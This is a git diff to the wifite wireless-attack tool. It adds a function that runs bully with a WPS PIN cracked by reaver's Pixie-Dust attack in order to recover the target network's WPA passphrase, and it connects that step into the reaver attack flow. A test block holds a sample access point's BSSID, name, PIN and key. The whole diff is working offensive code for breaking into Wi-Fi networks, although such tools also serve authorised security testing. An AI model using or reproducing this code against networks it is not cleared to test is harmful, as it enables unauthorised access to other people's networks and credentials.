diff --git a/wifite/tools/bully.py b/wifite/tools/bully.py index c083e02..cdc0862 100755 --- a/wifite/tools/bully.py +++ b/wifite/tools/bully.py @@ -2,12 +2,12 @@ # -*- coding: utf-8 -*- from ..model.attack import Attack +from ..model.wps_result import CrackResultWPS from ..tools.airodump import Airodump from ..util.color import Color from ..util.timer import Timer from ..util.process import Process from ..config import Configuration -from ..model.wps_result import CrackResultWPS import os, time, re from threading import Thread @@ -214,7 +214,48 @@ class Bully(Attack): def __del__(self): self.stop() + @staticmethod + def get_psk_from_pin(target, pin): + ''' + bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon + PIN : '01030365' + KEY : 'password' + BSSID : '34:21:09:01:92:7c' + ESSID : 'AirLink89300' + ''' + Color.pl('\n{+} found PIN: {G}%s{W}' % pin) + Color.p('{+} fetching {C}PSK{W} using {C}bully{W}... ') + cmd = [ + 'bully', + '--channel', target.channel, + '--bssid', target.bssid, + '--pin', pin, + '--bruteforce', + Configuration.interface + ] + + bully_proc = Process(cmd) + + for line in bully_proc.stderr().split('\n'): + key_re = re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line) + if key_re is not None: + psk = key_re.group(1) + Color.pl('{W}found PSK: {G}%s{W}' % psk) + return psk + + Color.pl('{R}failed{W}') + return None + if __name__ == '__main__': + Configuration.initialize() + Configuration.interface = 'wlan0mon' + from ..model.target import Target + fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',') + target = Target(fields) + psk = Bully.get_psk_from_pin(target, '01030365') + print "psk", psk + + ''' stdout = " [*] Pin is '11867722', key is '9a6f7997'" Configuration.initialize(False) from ..model.target import Target @@ -222,3 +263,4 @@ if __name__ == '__main__': target = Target(fields) b = Bully(target) b.parse_line(stdout) + ''' diff --git a/wifite/tools/reaver.py b/wifite/tools/reaver.py index 5a3fe48..2205941 100755 --- a/wifite/tools/reaver.py +++ b/wifite/tools/reaver.py @@ -6,6 +6,7 @@ from ..config import Configuration from ..util.color import Color from ..util.process import Process from ..tools.airodump import Airodump +from ..tools.bully import Bully # for PSK retrieval from ..model.wps_result import CrackResultWPS import os, time, re @@ -33,6 +34,7 @@ class Reaver(Attack): '--bssid', self.target.bssid, '--channel', self.target.channel, '--pixie-dust', '1', # pixie-dust attack + '--timeout', '4', # Stop waiting after 4 seconds #'--delay', '0', #'--no-nacks', '--session', '/dev/null', # Don't restart session @@ -80,9 +82,17 @@ class Reaver(Attack): # Check if we cracked it. if pin is not None: # We cracked it. + + if psk is None: + # Try to derive PSK from PIN using Bully + psk = Bully.get_psk_from_pin(self.target, pin) + bssid = self.target.bssid Color.clear_entire_line() - Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}") + if psk is None: + Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN{W} (but not PSK)") + else: + Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}") Color.pl("") self.crack_result = CrackResultWPS(bssid, ssid, pin, psk) self.crack_result.dump()